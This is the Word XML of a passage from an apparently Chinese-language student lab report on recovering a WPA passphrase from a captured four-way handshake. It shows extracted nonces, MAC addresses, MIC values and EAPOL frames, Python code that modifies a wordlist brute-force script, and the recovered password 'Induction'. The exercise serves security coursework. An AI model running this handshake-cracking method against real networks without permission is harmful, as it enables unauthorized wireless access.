          <w:p w14:paraId="67A76E13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</w:p>
          <w:p w14:paraId="1D36B70E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mic3 = "f2be18f46a6903a554c002ce4dd7eb54"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="571959FE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#The entire 802.1x frame of the forth handshake message with the MIC field set to all zeros </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3882FA3B" w14:textId="029E512D" w:rsidR="000C4E5A" w:rsidRDefault="002C07DE" w:rsidP="002C07DE">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia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3=a2b_hex("0103005f02030a0000000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B049595" w14:textId="6688C5AA" w:rsidR="000C4E5A" w:rsidRPr="00754468" w:rsidRDefault="000C4E5A" w:rsidP="00754468">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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 w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>运行结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230088B1" w14:textId="30A850C4" w:rsidR="00754468" w:rsidRPr="00754468" w:rsidRDefault="00DB5F84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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="442F364F" wp14:editId="07200B6F">
            <wp:extent cx="5274310" cy="716915"/>
            <wp:effectExtent l="0" t="0" r="254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44855" w14:textId="68E6E52D" w:rsidR="000C4E5A" w:rsidRDefault="00DB5F84" w:rsidP="006F00B9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto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跑不出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>结果，破解需要太长时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A15FBAA" w14:textId="643F03CF" w:rsidR="000C4E5A" w:rsidRPr="00A073B0" w:rsidRDefault="00A073B0" w:rsidP="000C4E5A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2）</w:t>
      </w:r>
      <w:r w:rsidR="000C4E5A" w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>针对</w:t>
      </w:r>
      <w:r w:rsidR="000C4E5A" w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>wpa-pwd-recovery-2.pcap</w:t>
      </w:r>
      <w:r w:rsidR="000C4E5A" w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>包</w:t>
      </w:r>
      <w:r w:rsidR="000C4E5A" w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的破解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484E293F" w14:textId="77777777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代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>需要更改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>RunTest()函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>注释掉，并更改相关数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79913100" w14:textId="189E9C03" w:rsidR="00754468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 w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>找出</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ssid值为</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Coherer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5211B90C" w14:textId="604EF42C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4FFA233C" wp14:editId="4A269A2D">
            <wp:extent cx="2981325" cy="733425"/>
            <wp:effectExtent l="0" t="0" r="9525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4D881" w14:textId="528C4AF4" w:rsidR="00754468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 w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>通过EAPOL第一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>找出ANo</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282289DB" w14:textId="2BBE8882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4787A610" wp14:editId="39FA8E8D">
            <wp:extent cx="5000625" cy="161925"/>
            <wp:effectExtent l="0" t="0" r="9525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F6ADA" w14:textId="0103F73F" w:rsidR="00754468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/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>EAPOL第二个</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>message找出</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SNonce</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SA</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mic1</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643C8695" w14:textId="63D1C90D" w:rsidR="00754468" w:rsidRP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021ADCA8" wp14:editId="5B8FBFD8">
            <wp:extent cx="5057775" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="952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3144B" w14:textId="19BF3FD5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402E7A71" wp14:editId="521C10D9">
            <wp:extent cx="3705225" cy="371475"/>
            <wp:effectExtent l="0" t="0" r="9525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0908A" w14:textId="0DE992C3" w:rsidR="00754468" w:rsidRPr="00A073B0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54B005E6" wp14:editId="7FDF3832">
            <wp:extent cx="3648075" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="952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E7F0E" w14:textId="1BD96843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7E81A535" wp14:editId="4EABDE69">
            <wp:extent cx="4210050" cy="238125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866B9" w14:textId="686373E5" w:rsidR="00754468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/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>EAPOL第三个</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>message找出mic2</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F20CCF4" w14:textId="1C0EC52C" w:rsidR="00754468" w:rsidRP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7DAEE3F3" wp14:editId="396BDF9B">
            <wp:extent cx="3648075" cy="18097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8E9D" w14:textId="2660A0DD" w:rsid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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64080CBC" wp14:editId="7897EB70">
            <wp:extent cx="4181475" cy="2933700"/>
            <wp:effectExtent l="0" t="0" r="952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1A31" w14:textId="15673616" w:rsidR="00754468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/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>EAPOL第四个</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>message找出mic3</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380AE7B1" w14:textId="495F3C6D" w:rsidR="00754468" w:rsidRPr="00754468" w:rsidRDefault="00754468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659E0CE5" wp14:editId="7B618B39">
            <wp:extent cx="3629025" cy="152400"/>
            <wp:effectExtent l="0" t="0" r="952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20792" w14:textId="04933599" w:rsidR="00A073B0" w:rsidRDefault="00754468" w:rsidP="000C4E5A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E7BD7CC" wp14:editId="10125CD8">
            <wp:extent cx="4124325" cy="2095500"/>
            <wp:effectExtent l="0" t="0" r="952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48BAA" w14:textId="30841369" w:rsidR="000C4E5A" w:rsidRPr="00754468" w:rsidRDefault="00754468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/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>运行程序，</w:t>
      </w:r>
      <w:r w:rsidR="000C4E5A" w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>下面仅放出更改部分代码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4E5A" w14:paraId="0879372A" w14:textId="77777777" w:rsidTr="000C4E5A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7338D84D" w14:textId="165C7E6A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if __name__ == "__main__":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66CEF76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#RunTest()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CF55CB8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#Read a file of passwords containing #passwords separated by a newline </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BF2CAD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with open('passwd.txt') as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C5BBB2D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>S = []</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36285B81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>for l in f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="454B398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</w:r>
            <w:r w:rsidRPr="002C07DE">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">S.append(l.strip()) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71E9FB4D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ssid name</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="385AB953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lastRenderedPageBreak/>
              <w:tab/>
              <w:t xml:space="preserve">ssid = "Coherer" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B8484D7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ANonce</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75E8DDDB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aNonce</w:t>
            </w:r>
            <w:r w:rsidRPr="002C07DE">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
              <w:t>= a2b_hex('3e8e967dacd960324cac5b6aa721235bf57b949771c867989f49d04ed47c6933')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01940BC8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SNonce</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27949674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sNonce</w:t>
            </w:r>
            <w:r w:rsidRPr="002C07DE">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">=a2b_hex("cdf405ceb9d889ef3dec42609828fae546b7add7baecbb1a394eac5214b1d386") </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A5CACB9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Authenticator MAC (AP)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="205AE640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 xml:space="preserve">apMac = a2b_hex("000c4182b255") </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A3FE773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    #Station address: MAC of client </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="609EFFD4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cliMac = a2b_hex("000d9382363a") #The first MIC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EC95077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mic1 = "a462a7029ad5ba30b6af0df391988e45"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C20C704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entire 802.1x frame of the second handshake message with the MIC field set to all zeros</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="307F9981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1</w:t>
            </w:r>
            <w:r w:rsidRPr="002C07DE">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
              <w:t>=a2b_hex("0203007502010a00100000000000000000cdf405ceb9d889ef3dec42609828fae546b7add7baecbb1a394eac5214b1d386000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020000")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A30B46B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second MIC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29863C7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mic2 = "7d0af6df51e99cde7a187453f0f93537"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DC9B782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entire 802.1x frame of the third handshake message with the MIC field set to all zeros</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E91C4C0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2</w:t>
            </w:r>
            <w:r w:rsidRPr="002C07DE">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
              <w:t>=a2b_hex("020300af0213ca001000000000000000013e8e967dacd960324cac5b6aa721235bf57b949771c867989f49d04ed47c6933f57b949771c867989f49d04ed47c6934cf0200000000000000000000000000000000000000000000000000000</w:t>
            </w:r>
            <w:r w:rsidRPr="002C07DE">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>00000000050cfa72cde35b2c1e2319255806ab364179fd9673041b9a5939fa1a2010d2ac794e25168055f794ddc1fdfae3521f4446bfd11da98345f543df6ce199df8fe48f8cdd17adca87bf45711183c496d41aa0c")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1935E161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>#The third MIC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="431401BB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</w:p>
          <w:p w14:paraId="71934550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mic3 = "10bba3bdfbcfde2bc537509d71f2ecd1"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39D6FADC" w14:textId="77777777" w:rsidR="002C07DE" w:rsidRPr="002C07DE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 xml:space="preserve">#The entire 802.1x frame of the forth handshake message with the MIC field set to all zeros </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15DADDBC" w14:textId="076299E0" w:rsidR="000C4E5A" w:rsidRDefault="002C07DE" w:rsidP="002C07DE">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C07DE">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
              <w:t>data3=a2b_hex("0203005f02030a0010000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2111FCA5" w14:textId="2A5112C5" w:rsidR="000C4E5A" w:rsidRPr="00754468" w:rsidRDefault="000C4E5A" w:rsidP="00754468">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>运行结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BAD382" w14:textId="33F6CB25" w:rsidR="00754468" w:rsidRPr="00754468" w:rsidRDefault="00271993" w:rsidP="00754468">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DDC161F" wp14:editId="1F496846">
            <wp:extent cx="5114925" cy="139065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EDB4" w14:textId="2FB57371" w:rsidR="000C4E5A" w:rsidRPr="000C4E5A" w:rsidRDefault="00271993" w:rsidP="006F00B9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>得到口令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Induction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272C1810" w14:textId="405F2F36" w:rsidR="005A1724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九</w:t>
      </w:r>
      <w:r w:rsidR="005A1724" w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>、总结及心得体会：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219A7791" w14:textId="7454CBA2" w:rsidR="00F96931" w:rsidRPr="00F74DCD" w:rsidRDefault="004F641B" w:rsidP="00F74DCD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F74DCD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F74DCD" w:rsidRPr="00F74DCD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidR="00F74DCD" w:rsidRPr="00F74DCD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>本次实验</w:t>
      </w:r>
      <w:r w:rsidR="00F74DCD" w:rsidRPr="00F74DCD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>了解</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>了暴力破解的</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>基本</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>步骤，加深了对</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>四次</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>握手的交换过程的理解</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，最终</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实现了成功破解密码。当然</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>破解</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>耗时很长，并且密码并不是很复杂</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>证明了</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>密码学</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>以及网络协议的可靠性</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>此外</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>收获</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的是在日常生活中不要使用弱</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>口令</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，需要定期进行密码更换，平台也应该进行</w:t>
      </w:r>
      <w:r w:rsidR="00F96931">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
